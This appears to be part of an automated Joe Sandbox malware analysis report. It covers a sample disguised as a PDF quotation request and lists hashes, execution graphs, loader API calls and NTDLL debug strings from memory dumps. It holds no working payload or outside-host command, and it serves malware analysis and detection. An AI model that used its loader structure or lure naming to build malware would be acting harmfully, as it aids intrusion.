                                                                  • Instruction ID: 1c6bc935148bde587bc9da5cb3a0ea501620258571be05393824be08d3db4b65
                                                                  • Opcode Fuzzy Hash: 90af2a94f5e8cbce37e0ebea2978ea17b220c1581b6a8d94964cf8aa3a16d133
                                                                  • Instruction Fuzzy Hash: A701AD34784304AFEB01EFA4DC65F6E37EDFB88B00F614820BA08D3640E634AD048B28
                                                                  Function 0296AD64 Relevance: 5.1, APIs: 4, Instructions: 72COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • IsBadReadPtr.KERNEL32(?,00000004), ref: 0296AD98
                                                                  • IsBadWritePtr.KERNEL32(?,00000004), ref: 0296ADC8
                                                                  • IsBadReadPtr.KERNEL32(?,00000008), ref: 0296ADE7
                                                                  • IsBadReadPtr.KERNEL32(?,00000004), ref: 0296ADF3
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1427015782.0000000002951000.00000020.00001000.00020000.00000000.sdmp, Offset: 02950000, based on PE: true
                                                                  • Associated: 00000001.00000002.1426999222.0000000002950000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427114571.000000000297D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427114571.00000000029AE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427232459.00000000029B1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427232459.0000000002AA5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1427232459.0000000002AA8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_2950000_RTD20241038II Listed Parts And Quotation Request ,pdf.jbxd
                                                                  Similarity
                                                                  • API ID: Read$Write
                                                                  • String ID:
                                                                  • API String ID: 3448952669-0
                                                                  • Opcode ID: 234bf798fc81b872ff5a85eead7648d9943be952996fa50f1c2af5a655f4751e
                                                                  • Instruction ID: 959cbe57e4609db7f415e8403951481014f07a9b0b7d2f8160346b098aad792d
                                                                  • Opcode Fuzzy Hash: 234bf798fc81b872ff5a85eead7648d9943be952996fa50f1c2af5a655f4751e
                                                                  • Instruction Fuzzy Hash: F32181B1A412199BDB10DF69CC94BAE77F9FF84362F408112EE50A7340EB34E911DBA4

                                                                  Execution Graph

                                                                  Execution Coverage:0.9%
                                                                  Dynamic/Decrypted Code Coverage:5.3%
                                                                  Signature Coverage:0%
                                                                  Total number of Nodes:133
                                                                  Total number of Limit Nodes:14
                                                                  execution_graph 90155 430063 90157 430089 90155->90157 90156 4300db 90157->90156 90160 429ec3 90157->90160 90159 430130 90161 429f21 90160->90161 90163 429f35 90161->90163 90164 417bb3 90161->90164 90163->90159 90165 417b81 90164->90165 90168 417bc6 90164->90168 90166 417b93 LdrLoadDll 90165->90166 90167 417baa 90165->90167 90166->90167 90167->90163 90168->90163 90169 2ce12b60 LdrInitializeThunk 90170 425143 90174 42515c 90170->90174 90171 4251a4 90178 42ebe3 90171->90178 90174->90171 90175 4251e4 90174->90175 90177 4251e9 90174->90177 90176 42ebe3 RtlFreeHeap 90175->90176 90176->90177 90181 42ce73 90178->90181 90180 4251b4 90182 42ce90 90181->90182 90183 42cea1 RtlFreeHeap 90182->90183 90183->90180 90184 42fce3 90185 42ebe3 RtlFreeHeap 90184->90185 90186 42fcf8 90185->90186 90187 42fc83 90188 42fc93 90187->90188 90189 42fc99 90187->90189 90192 42ecc3 90189->90192 90191 42fcbf 90195 42ce23 90192->90195 90194 42ecde 90194->90191 90196 42ce40 90195->90196 90197 42ce51 RtlAllocateHeap 90196->90197 90197->90194 90198 424da3 90199 424dbf 90198->90199 90200 424de7 90199->90200 90201 424dfb 90199->90201 90203 42cb13 NtClose 90200->90203 90208 42cb13 90201->90208 90205 424df0 90203->90205 90204 424e04 90211 42ed03 RtlAllocateHeap 90204->90211 90207 424e0f 90209 42cb30 90208->90209 90210 42cb41 NtClose 90209->90210 90210->90204 90211->90207 90212 429e23 90213 429e87 90212->90213 90214 429eba 90213->90214 90217 413e43 90213->90217 90216 429e9c 90218 413e52 90217->90218 90219 413e0e 90217->90219 90222 42cd93 90219->90222 90223 42cdad 90222->90223 90226 2ce12c70 LdrInitializeThunk 90223->90226 90224 413e25 90224->90216 90226->90224 90227 413fe3 90231 414003 90227->90231 90229 41406c 90230 414062 90231->90229 90232 41b793 RtlFreeHeap LdrInitializeThunk LdrInitializeThunk 90231->90232 90232->90230 90233 414083 90235 4140a9 90233->90235 90234 4140d3 90235->90234 90237 413e03 LdrInitializeThunk 90235->90237 90237->90234 90238 42c0f3 90239 42c110 90238->90239 90242 2ce12df0 LdrInitializeThunk 90239->90242 90240 42c138 90242->90240 90243 401af2 90244 401b20 90243->90244 90245 401bf3 EntryPoint 90244->90245 90246 401c20 90245->90246 90246->90246 90249 430153 90246->90249 90252 42e793 90249->90252 90253 42e7b9 90252->90253 90262 4075c3 90253->90262 90255 42e7cf 90261 401c2a 90255->90261 90265 41b483 90255->90265 90257 42e7ee 90258 42cec3 ExitProcess 90257->90258 90259 42e803 90257->90259 90258->90259 90276 42cec3 90259->90276 90279 4167e3 90262->90279 90264 4075d0 90264->90255 90266 41b4af 90265->90266 90297 41b373 90266->90297 90269 41b4dc 90272 41b4e7 90269->90272 90273 42cb13 NtClose 90269->90273 90270 41b510 90270->90257 90271 41b4f4 90271->90270 90274 42cb13 NtClose 90271->90274 90272->90257 90273->90272 90275 41b506 90274->90275 90275->90257 90277 42cee0 90276->90277 90278 42cef1 ExitProcess 90277->90278 90278->90261 90280 416800 90279->90280 90282 416819 90280->90282 90283 42d573 90280->90283 90282->90264 90284 42d58d 90283->90284 90285 42d5bc 90284->90285 90290 42c143 90284->90290 90285->90282 90288 42ebe3 RtlFreeHeap 90289 42d635 90288->90289 90289->90282 90291 42c15d 90290->90291 90294 2ce12c0a 90291->90294 90292 42c189 90292->90288 90295 2ce12c11 90294->90295 90296 2ce12c1f LdrInitializeThunk 90294->90296 90295->90292 90296->90292 90298 41b38d 90297->90298 90302 41b469 90297->90302 90303 42c1e3 90298->90303 90301 42cb13 NtClose 90301->90302 90302->90269 90302->90271 90304 42c1fd 90303->90304 90307 2ce135c0 LdrInitializeThunk 90304->90307 90305 41b45d 90305->90301 90307->90305 90308 41b673 90309 41b6b7 90308->90309 90310 42cb13 NtClose 90309->90310 90311 41b6d8 90309->90311 90310->90311 90312 41e873 90313 41e899 90312->90313 90317 41e996 90313->90317 90318 42fd23 RtlAllocateHeap RtlFreeHeap 90313->90318 90315 41e934 90316 42c143 LdrInitializeThunk 90315->90316 90315->90317 90316->90317 90318->90315 90319 4190f8 90320 42cb13 NtClose 90319->90320 90321 419102 90320->90321

                                                                  Executed Functions

                                                                  Function 00401560 Relevance: 14.6, APIs: 1, Strings: 7, Instructions: 561COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000001.1400986330.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_1_400000_kmtqwssC.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: @$B$a```$gfff$gfff$gfff$gfff
                                                                  • API String ID: 0-3667867154
                                                                  • Opcode ID: 50a344c5d8cad1bac2f9cdccde6dd67feee0f91bdaaa4a749f4ed1f71307396b
                                                                  • Instruction ID: 4d4c1e64281832a49f187a404ecdf2e47e159528420c40e4fc39f5ea6f09713e
                                                                  • Opcode Fuzzy Hash: 50a344c5d8cad1bac2f9cdccde6dd67feee0f91bdaaa4a749f4ed1f71307396b
                                                                  • Instruction Fuzzy Hash: 3C021771F0011947DB2C9959CC95BFE726AE794304F5881BBEA0AEF3E1E6389F448B44
                                                                  Function 00417B33 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 92 417b33-417b4f 93 417b57-417b5c 92->93 94 417b52 call 42f7c3 92->94 95 417b62-417b70 call 42fdc3 93->95 96 417b5e-417b61 93->96 94->93 99 417b80-417b91 call 42e263 95->99 100 417b72-417b7d call 430063 95->100 105 417b93-417ba7 LdrLoadDll 99->105 106 417baa-417bad 99->106 100->99 105->106
                                                                  APIs
                                                                  • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417BA5
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1810794029.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_400000_kmtqwssC.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: Load
                                                                  • String ID:
                                                                  • API String ID: 2234796835-0
                                                                  • Opcode ID: 9d75b0684c7b2c85136cce4d19a8f736d81c15d4d2bc0a663619e57a58b04cfb
                                                                  • Instruction ID: 331d18eb78583633b9e29c6af9a4f26b0dc20ce173b82e1c0a0b08c061dba126
                                                                  • Opcode Fuzzy Hash: 9d75b0684c7b2c85136cce4d19a8f736d81c15d4d2bc0a663619e57a58b04cfb
                                                                  • Instruction Fuzzy Hash: 780112B5E4410DA7DB10DAA5DC42FDEB3789F54708F0041A6E90897240F635EB588795
                                                                  Function 0042CB13 Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 130 42cb13-42cb4f call 404973 call 42dd63 NtClose
                                                                  APIs
                                                                  • NtClose.NTDLL(?,?,00000000,00000000,0000001F,?,FA0A1F00), ref: 0042CB4A
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1810794029.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_400000_kmtqwssC.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: Close
                                                                  • String ID:
                                                                  • API String ID: 3535843008-0
                                                                  • Opcode ID: 621a3b87d4f233dfb6b6f7d7240c0c3b66d092fca9b72b9a237939f90996aef9
                                                                  • Instruction ID: 71597bb0a06a303982d629d451bdfe7f1673587ba4a769b47156b06249900e13
                                                                  • Opcode Fuzzy Hash: 621a3b87d4f233dfb6b6f7d7240c0c3b66d092fca9b72b9a237939f90996aef9
                                                                  • Instruction Fuzzy Hash: 44E0DF312002003BD220AA2AEC42F9B735CDBC5710F00441AFA09A7141C670790187E4
                                                                  Function 2CE12C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 145 2ce12c70-2ce12c7c LdrInitializeThunk
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1881572737.000000002CDA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 2CDA0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_2cda0000_kmtqwssC.jbxd
                                                                  Similarity
                                                                  • API ID: InitializeThunk
                                                                  • String ID:
                                                                  • API String ID: 2994545307-0
                                                                  • Opcode ID: 182ad5ebd333f2595a9264aa19fda1354a2799ea7d54ac5dae5746a7433254a7
                                                                  • Instruction ID: 51563348edf9427f8c8f954409dc49371244d3971d3419dbe15346b2fd6ffa49
                                                                  • Opcode Fuzzy Hash: 182ad5ebd333f2595a9264aa19fda1354a2799ea7d54ac5dae5746a7433254a7
                                                                  • Instruction Fuzzy Hash: B090027220198802D2607158844674A00054BD0301F59C411A4524618D8A95C9917122
                                                                  Function 2CE12DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 146 2ce12df0-2ce12dfc LdrInitializeThunk
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1881572737.000000002CDA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 2CDA0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_2cda0000_kmtqwssC.jbxd
                                                                  Similarity
                                                                  • API ID: InitializeThunk
                                                                  • String ID:
                                                                  • API String ID: 2994545307-0
                                                                  • Opcode ID: d4476cf794710469fd0f59d03c0e65073cc13130bf66bbdde6591ac3a1cf6814
                                                                  • Instruction ID: d15fbe826422809f327e8ef2e940510a51e6e92e7746d645e1626ff1098ac2f2
                                                                  • Opcode Fuzzy Hash: d4476cf794710469fd0f59d03c0e65073cc13130bf66bbdde6591ac3a1cf6814
                                                                  • Instruction Fuzzy Hash: 5F90027220190413D2617158454670700094BD0241F95C412A0524518D9A56CA52A122
                                                                  Function 2CE12B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 144 2ce12b60-2ce12b6c LdrInitializeThunk
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1881572737.000000002CDA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 2CDA0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_2cda0000_kmtqwssC.jbxd
                                                                  Similarity
                                                                  • API ID: InitializeThunk
                                                                  • String ID:
                                                                  • API String ID: 2994545307-0
                                                                  • Opcode ID: f515dcbd623553ab96189e9f63227cf2880c232925b22442dcc029e45fee1725
                                                                  • Instruction ID: bdca0e2d6cee5c8ac63c730d5250ca78c064665a4a10718106f98e6d1da71daf
                                                                  • Opcode Fuzzy Hash: f515dcbd623553ab96189e9f63227cf2880c232925b22442dcc029e45fee1725
                                                                  • Instruction Fuzzy Hash: 0E9002B220290003425571584456716400A4BE0201B55C021E1114550DC925C9916126
                                                                  Function 2CE135C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1881572737.000000002CDA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 2CDA0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_2cda0000_kmtqwssC.jbxd
                                                                  Similarity
                                                                  • API ID: InitializeThunk
                                                                  • String ID:
                                                                  • API String ID: 2994545307-0
                                                                  • Opcode ID: 353de8f2b76b0402d25e479dc8431d8da2accbeb7fbc6a2c94298b4779fa9733
                                                                  • Instruction ID: 215965ae3a9272cc8b80aae56b51a126fc5117074cd16bf7c3e5e73620cf5f1b
                                                                  • Opcode Fuzzy Hash: 353de8f2b76b0402d25e479dc8431d8da2accbeb7fbc6a2c94298b4779fa9733
                                                                  • Instruction Fuzzy Hash: D0900272605A0402D2507158455670610054BD0201F65C411A0524528D8B95CA5165A3
                                                                  Function 00401AF2 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 123COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 0 401af2-401b18 1 401b20-401b33 0->1 1->1 2 401b35-401b51 call 4010e0 1->2 5 401b56-401b5c 2->5 5->5 6 401b5e-401b82 call 401d70 5->6 9 401b87-401b8d 6->9 9->9 10 401b8f-401b9e 9->10 11 401ba3-401ba4 10->11 11->11 12 401ba6-401bab 11->12 13 401bb0-401bc1 12->13 13->13 14 401bc3-401bd8 13->14 14->14 15 401bda-401bdf 14->15 16 401be0-401bf1 15->16 16->16 17 401bf3-401c19 EntryPoint 16->17 18 401c20-401c26 17->18 18->18 19 401c28 call 430153 18->19 20 401c2a-401c2d 19->20 21 401c32-401c45 20->21 21->21 22 401c47-401c4c 21->22 23 401c50-401c61 22->23 23->23 24 401c63-401c78 23->24
                                                                  APIs
                                                                  • EntryPoint.KMTQWSSC(?,0000032C,?), ref: 00401BFF
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1810794029.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_400000_kmtqwssC.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: EntryPoint
                                                                  • String ID: a```
                                                                  • API String ID: 3225343992-3259403941
                                                                  • Opcode ID: 37e4198fb5929ccfe9e0cdf19a80b84de2d2ff779a2e1572c8cfdac560582edc
                                                                  • Instruction ID: 9cd544999dd2b03daafdb1c4164150612a4eeb260070e7f16c4efc787f4e75c6
                                                                  • Opcode Fuzzy Hash: 37e4198fb5929ccfe9e0cdf19a80b84de2d2ff779a2e1572c8cfdac560582edc
                                                                  • Instruction Fuzzy Hash: ED31F771F042194BDF1C86288C507AEB666DB94344F4881BBE909AF7E1E6786E448B84
                                                                  Function 0042CE73 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 29memoryCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 26 42ce73-42ceb7 call 404973 call 42dd63 RtlFreeHeap
                                                                  APIs
                                                                  • RtlFreeHeap.NTDLL(00000000,00000004,00000000,?,00000007,00000000,00000004,00000000,?,000000F4), ref: 0042CEB2
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1810794029.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_400000_kmtqwssC.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: FreeHeap
                                                                  • String ID: whA
                                                                  • API String ID: 3298025750-33568622
                                                                  • Opcode ID: f7f17f16f19a4c2e0ff3f1a24c14e8ee95f433df49a0a93ff094377edf1ac6b4
                                                                  • Instruction ID: df9e10e1718a61ed7688cb98799c3328294b3d2316893391272a51bf3c6f2a62
                                                                  • Opcode Fuzzy Hash: f7f17f16f19a4c2e0ff3f1a24c14e8ee95f433df49a0a93ff094377edf1ac6b4
                                                                  • Instruction Fuzzy Hash: 5EE06DB26002047BD610EF59EC81EAB33ACEFC5710F40401AFA08A7241C671B910CBF9
                                                                  Function 00417BB3 Relevance: 1.6, APIs: 1, Instructions: 105libraryloaderCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 70 417bb3-417bc4 71 417b81-417b83 70->71 72 417bc6-417bd3 70->72 75 417b89-417b91 71->75 76 417b84 call 42e263 71->76 73 417bd5-417bd6 72->73 74 417bd7-417bde 72->74 73->74 79 417be1-417be7 74->79 77 417b93-417ba7 LdrLoadDll 75->77 78 417baa-417bad 75->78 76->75 77->78 80 417be9 79->80 81 417bed-417bf5 79->81 82 417bea 80->82 83 417c5f-417c64 80->83 84 417bfa-417c03 81->84 82->84 87 417beb-417bec 82->87 85 417c41-417c55 83->85 86 417c66-417c6f 83->86 84->85 85->79 90 417c57-417c58 85->90 89 417c71-417c91 86->89 87->81 90->89 91 417c5a-417c5e 90->91 91->83
                                                                  APIs
                                                                  • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417BA5
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1810794029.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_400000_kmtqwssC.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: Load
                                                                  • String ID:
                                                                  • API String ID: 2234796835-0
                                                                  • Opcode ID: 9c1eec5154773877787138fe86bce77930200dc82f902c6671fe6d8f6ed452b9
                                                                  • Instruction ID: 93b2374f167c02f6a28249779b1fd5adc8fce152e1fc3efdeaf84b546dfcf957
                                                                  • Opcode Fuzzy Hash: 9c1eec5154773877787138fe86bce77930200dc82f902c6671fe6d8f6ed452b9
                                                                  • Instruction Fuzzy Hash: 4421C07294C206ABDB00E9749846ACB7774FB45318F04455AD80C9B702E739B6968BD5
                                                                  Function 00417B27 Relevance: 1.5, APIs: 1, Instructions: 35libraryloaderCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 107 417b27-417b30 108 417b90-417ba7 LdrLoadDll 107->108 109 417b32-417b5c call 42f7c3 107->109 110 417baa-417bad 108->110 114 417b62-417b70 call 42fdc3 109->114 115 417b5e-417b61 109->115 118 417b80-417b91 call 42e263 114->118 119 417b72-417b7d call 430063 114->119 118->110 124 417b93-417ba7 LdrLoadDll 118->124 119->118 124->110
                                                                  APIs
                                                                  • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417BA5
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1810794029.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_400000_kmtqwssC.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: Load
                                                                  • String ID:
                                                                  • API String ID: 2234796835-0
                                                                  • Opcode ID: a6e2919529e9c876640029debfc0c632573f28569a56996c2d7557fe68807e94
                                                                  • Instruction ID: 520125f5abcca6f32ee259adfec299557dcb37a3b4497778880cbe12b8f3150b
                                                                  • Opcode Fuzzy Hash: a6e2919529e9c876640029debfc0c632573f28569a56996c2d7557fe68807e94
                                                                  • Instruction Fuzzy Hash: A4F02BB190C24DABCB20CE64DC409DDBB74AF55234F0487EED998671C2E2305649C756
                                                                  Function 0042CE23 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 125 42ce23-42ce67 call 404973 call 42dd63 RtlAllocateHeap
                                                                  APIs
                                                                  • RtlAllocateHeap.NTDLL(?,0041E934,?,?,00000000,?,0041E934,?,?,?), ref: 0042CE62
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1810794029.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_400000_kmtqwssC.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: AllocateHeap
                                                                  • String ID:
                                                                  • API String ID: 1279760036-0
                                                                  • Opcode ID: 95b7bf504a5d7150f79f6da0c0947be83d3fb5d3e638616617d95ae11c794cbc
                                                                  • Instruction ID: 54a44c9eb01fc689f5ac2f601c65d0757ab140ae4e4e75f286cde17a1d142988
                                                                  • Opcode Fuzzy Hash: 95b7bf504a5d7150f79f6da0c0947be83d3fb5d3e638616617d95ae11c794cbc
                                                                  • Instruction Fuzzy Hash: 86E06DB52042047BD620EE59EC45EEB37ADEFC5710F40441AFA48A7241CA70B9108BB9
                                                                  Function 0042CEC3 Relevance: 1.5, APIs: 1, Instructions: 25COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 135 42cec3-42ceff call 404973 call 42dd63 ExitProcess
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1810794029.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_400000_kmtqwssC.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: ExitProcess
                                                                  • String ID:
                                                                  • API String ID: 621844428-0
                                                                  • Opcode ID: 48a4ca06673889c6306624666cc140c898ea0e1073073a3aa0900f5f06714748
                                                                  • Instruction ID: 54eb179f5a4ec7a69d43dd70d9c2d94cb10809d16adc756a8638f1923563bae3
                                                                  • Opcode Fuzzy Hash: 48a4ca06673889c6306624666cc140c898ea0e1073073a3aa0900f5f06714748
                                                                  • Instruction Fuzzy Hash: 64E04F712102147BD120EA6ADC41F9BB76CDBC5714F40802AFA08A7281C670B90187F4
                                                                  Function 2CE12C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 140 2ce12c0a-2ce12c0f 141 2ce12c11-2ce12c18 140->141 142 2ce12c1f-2ce12c26 LdrInitializeThunk 140->142
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1881572737.000000002CDA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 2CDA0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_2cda0000_kmtqwssC.jbxd
                                                                  Similarity
                                                                  • API ID: InitializeThunk
                                                                  • String ID:
                                                                  • API String ID: 2994545307-0
                                                                  • Opcode ID: b1f0ef4f3446b4a6ff0de7ebf802db40e72720ffdeedc1b57e1c63ac2d66fbaa
                                                                  • Instruction ID: 4038e5b3639bbcbda23c7b6b53f082b4468788d1bb17bd7ffcfe7986328e80e1
                                                                  • Opcode Fuzzy Hash: b1f0ef4f3446b4a6ff0de7ebf802db40e72720ffdeedc1b57e1c63ac2d66fbaa
                                                                  • Instruction Fuzzy Hash: 88B09B729059C6C6D751E7604A0970779006BD0705F15C161D3134641F4778C5D1F576

                                                                  Non-executed Functions

                                                                  Function 2CE88D10 Relevance: 37.8, Strings: 30, Instructions: 268COMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  Strings
                                                                  • The critical section is owned by thread %p., xrefs: 2CE88E69
                                                                  • *** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 2CE88D8C
                                                                  • This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 2CE88F34
                                                                  • The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 2CE88DD3
                                                                  • The resource is owned exclusively by thread %p, xrefs: 2CE88E24
                                                                  • The resource is owned shared by %d threads, xrefs: 2CE88E2E
                                                                  • *** enter .exr %p for the exception record, xrefs: 2CE88FA1
                                                                  • *** Resource timeout (%p) in %ws:%s, xrefs: 2CE88E02
                                                                  • write to, xrefs: 2CE88F56
                                                                  • *** A stack buffer overrun occurred in %ws:%s, xrefs: 2CE88DA3
                                                                  • This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 2CE88DB5
                                                                  • *** Critical Section Timeout (%p) in %ws:%s, xrefs: 2CE88E4B
                                                                  • *** enter .cxr %p for the context, xrefs: 2CE88FBD
                                                                  • If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 2CE88DC4
                                                                  • This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 2CE88F2D
                                                                  • The instruction at %p tried to %s , xrefs: 2CE88F66
                                                                  • This failed because of error %Ix., xrefs: 2CE88EF6
                                                                  • *** then kb to get the faulting stack, xrefs: 2CE88FCC
                                                                  • read from, xrefs: 2CE88F5D, 2CE88F62
                                                                  • *** Inpage error in %ws:%s, xrefs: 2CE88EC8
                                                                  • The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 2CE88E86
                                                                  • The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 2CE88E3F
                                                                  • The instruction at %p referenced memory at %p., xrefs: 2CE88EE2
                                                                  • a NULL pointer, xrefs: 2CE88F90
                                                                  • an invalid address, %p, xrefs: 2CE88F7F
                                                                  • *** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 2CE88FEF
                                                                  • *** An Access Violation occurred in %ws:%s, xrefs: 2CE88F3F
                                                                  • This means that the I/O device reported an I/O error. Check your hardware., xrefs: 2CE88F26
                                                                  • <unknown>, xrefs: 2CE88D2E, 2CE88D81, 2CE88E00, 2CE88E49, 2CE88EC7, 2CE88F3E
                                                                  • Go determine why that thread has not released the critical section., xrefs: 2CE88E75
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1881572737.000000002CDA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 2CDA0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_2cda0000_kmtqwssC.jbxd
                                                                  Similarity
                                                                  • API ID:
